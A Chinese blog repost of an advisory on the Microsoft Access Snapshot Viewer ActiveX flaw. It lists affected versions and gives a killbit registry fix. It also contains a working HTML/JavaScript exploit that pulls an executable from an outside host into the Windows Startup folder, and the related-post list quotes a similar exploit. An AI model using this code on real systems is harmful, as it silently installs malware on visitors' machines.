MS Office Snapshot Viewer ActiveX Exploit

最新推荐文章于 2024-08-25 17:25:35 发布
最新推荐文章于 2024-08-25 17:25:35 发布
阅读量826 收藏
点赞数
文章标签: office microsoft access javascript 工具 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2659228
版权
  影响系统:
Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622

详细:

受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.
Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.



测试方法:
  1. <html>  
  2. <object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>  
  3. <script language='javascript'>  
  4.   
  5. var buf1 = 'http://xgymcn.5d6d.com/test.exe';   
  6. var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';   
  7. obj.SnapshotPath = buf1;   
  8. obj.CompressedPath = buf2;   
  9. obj.PrintSnapshot();   
  10. </script>  
  11. </html>  


推荐的应对方法:
目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:
[url=http://www.microsoft.com/technet/security/]http://www.microsoft.com/t...[/url]
将以下CLSID设置KILLBIT:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/ActiveX Compatibility/{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Snapshot Viewer报表快照97
12-02
其实2000是带有这个工具的啦,但ACCESS97是没有这个工具的,你可以从这里下载<P> 创建报表快照后,用户即可单独发布生成的快照文件。使用Snapshot ViewerMicrosoft Access可以通过电子邮件传送报表快照  
Access很好用的报表快照Snapshot View(snp文件)
VB.Net+Android.java
03-03 4007
Access写数据库程序,还是蛮有用的。快捷、方便,容易上手。报表快照文件Snapshot View.snp
Microsoft Office Snapshot Viewer ActiveX Exploit
07-15 845
 Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞EXP:var buf1 = http://127.0.0.1/a.exe;var buf2 = C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe;obj.SnapshotPath = buf1;obj.CompressedPath =
MS Office Snapshot Viewer ActiveX Exploit (可执行版)
weixin_30879833的博客
07-21 104
可执行版,请勿用于非法用途。 <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Fi...
gcviewer-1.36-SNAPSHOT
09-16
gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-SNAPSHOT gcviewer-1.36-...
gcviewer-1.36-SNAPSHOT.jar
03-15
gcviewer-1.36-SNAPSHOT.jar 主要是jvm 内存垃圾回收 界面图示展示分析 非常好的一筐工具
gcviewer-1.37-SNAPSHOT.jar|gcviewer-1.37-SNAPSHOT.jar
10-16
GC日志可视化分析工具GCviewer。通过GC日志可视化分析工具,我们可以很方便的看到JVM各个分代的内存使用情况、垃圾回收次数、垃圾回收的原因、垃圾回收占用的时间、吞吐量等,这些指标在我们进行JVM调优的时候是很...
CCS 5.5以上版本添加软件仿真(Simulation)功能,并通过两个demo(软件仿真实例)验证
weixin_46943050的博客
12-26 8657
CCS5.5以上版本添加软件仿真(Simulation)功能,并通过两个demo(软件仿真实例)验证
[指南]微软发布Windows-Linux双系统无法启动的完整修复方案
最新发布
weixin_41446370的博客
08-25 127
早前微软发布的 2024-08 例行安全更新导致 Windows-Linux 双系统无法启动引起关注,该问题实际上在 7 月份微软已经发现并且添加到已知问题列表中,但可能很多用户没注意结果安装更新后 Linux 系统无法正常启动。但这个问题也不是影响所有 Linux 系统,对于较新的 Linux 系统不受影响,如果用户使用的版本比较老旧则会出现无法启动,现在微软也发布了详细的解决方案。在禁用安全启动后用户可以进入 Linux 系统,此时重启系统进入 Linux 并打开终端管理器并执行如下命令。
QDialog中的不同模式
淘气の小狼人的博客
08-24 202
QDialog的不同用法
微软正式确认将在近期关闭经典Windows控制面板
weixin_41446370的博客
08-22 838
在新的支持页面上,我们详细介绍了各种原生 Windows 配置工具,在这篇专门文章中,微软终于声明控制面板"正在被淘汰,取而代之的是设置应用"。提示:虽然出于兼容性考虑,控制面板仍然存在,并且可以访问某些尚未迁移的设置,但我们建议您尽可能使用"设置"应用程序。与微软似乎希望尽早取消的"3D 画图"功能类似,Windows"控制面板"也是这家科技巨头一直希望取消的功能。控制面板正在被淘汰,取而代之的是"设置"应用程序,它提供了更现代、更简化的体验。此外,该公司还补充说,旧版应用程序的存在有一定的兼容性原因。
【Qt】dialog设置无边框之后,模态窗口失效,无法阻止与其他窗口交互
1900的博客
08-22 201
但是现在,解决了交互问题之后,无论是用方法1(加了Qt::Dialog)还是方法2(不指定父对象)都会导致这里位置设置失效。设置的位置变成了全局位置,那就拿到父对象的全局位置,加进去计算,让其仍然相对与父对象居中。就会会导致模态的设置无效。你在实例化dialog的时候不要给他指定父对象,这样也可以实现模态。本来我弹窗出来的时候我会给他指定一个位置,这个位置是靠。我在这个dialog的构造函数中设置了他为模态窗口。但是由于我的业务需求,我还设置了它为无边框窗口。我这样可以让弹窗每次都弹到父对象的中间位置。
什么是d3dx9_42.dll?如何将丢失的d3dx9_42.dll进行修复呢?
电脑修复君的博客
08-24 918
d3dx9_42.dll文件丢失什么情况?如何将丢失的d3dx9_42.dll进行修复呢?d3dx9_42.dll又是什么文件?d3dx9_42.dll 文件是一个由 Microsoft Corporation 开发的部分,属于 Microsoft DirectX for Windows 的一组庞大库集合中的一个。DirectX 是专为高性能游戏和其他图形密集型程序而设计的一系列应用程序接口(APIs),d3dx9_42.dll提供了一种与硬件设备直接交互的方法,尤其是图形和声音相关的硬件。
Spring Cloud Consul面试题
yang_xs的博客
08-22 960
Spring Cloud Consul 是微服务架构中的一个重要组件,用于服务发现、配置管理以及健康检查。了解 Spring Cloud Consul 的工作原理和应用场景,对于微服务开发者和架构师来说至关重要。以下是一些常见的 Spring Cloud Consul 面试问题及其详细解答,旨在帮助你更好地准备相关面试。Spring Cloud Consul 是 Spring Cloud 提供的一个集成模块,它基于 HashiCorp 的 Consul 系统,主要用于微服务架构中的服务发现和配置管理。
C++ 设计模式——外观模式
qq_68194402的博客
08-22 1125
外观模式(Facade Pattern)是一种结构性设计模式,它为复杂的子系统提供一个简单的接口。通过外观模式,客户端通过外观类与子系统进行交互,外观类将客户端的请求委托给适当的子系统对象,从而实现功能的调用。这样的设计隐藏了子系统的复杂性,使得客户端与子系统之间的耦合度降低。
使用Intent在活动之间穿梭
m0_63526467的博客
08-23 728
使用Intent在活动之间穿梭
Linux学习记录(十三)----信号
qq_63556165的博客
08-23 1009
数,而其绝对值又大于信号的现值,操作将会阻塞,直到信号值大于或等于sem_op的绝对值。信号通信,其实就是内核向用户空间进程发送信号,只有内核才能发信号,用户空间进程不能发送信号。自己处理信号的方法告诉内核,这样你的进程收到了这个信号就会采用你自己的的处理方式。如果sem_op的值为0,则操作将暂时阻塞,直到信号的值变为0。让父进程或子进程收到信号后执行一些特定的操作为信号父子进程间的通信。1.进程的默认处理方式(内核为用户进程设置的默认处理方式)信号的处理(接收信号进程) :signal。
vue ref和reactive区别
灰海
08-25 249
在第二个示例中,我们使用了reactive来创建一个名为state的响应式对象,它包含name和age两个属性。在模板中,我们通过{{ state.name }}和{{ state.age }}来显示state对象的属性值。在第一个示例中,我们使用了ref来创建一个名为count的响应式引用,它是一个简单的数字类型。在模板中,我们通过{{ count }}直接显示count的值,而不需要.value前缀,因为Vue的模板语法会自动处理ref的.value访问。
java -jar gcviewer-1.36-snapshot.jar
11-26
java -jar gcviewer-1.36-snapshot.jar是一个用于分析Java虚拟机垃圾回收日志的工具。通过在命令行中输入该命令,可以运行gcviewer-1.36-snapshot.jar文件,打开相应的图形界面界面以分析垃圾回收日志。该工具可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值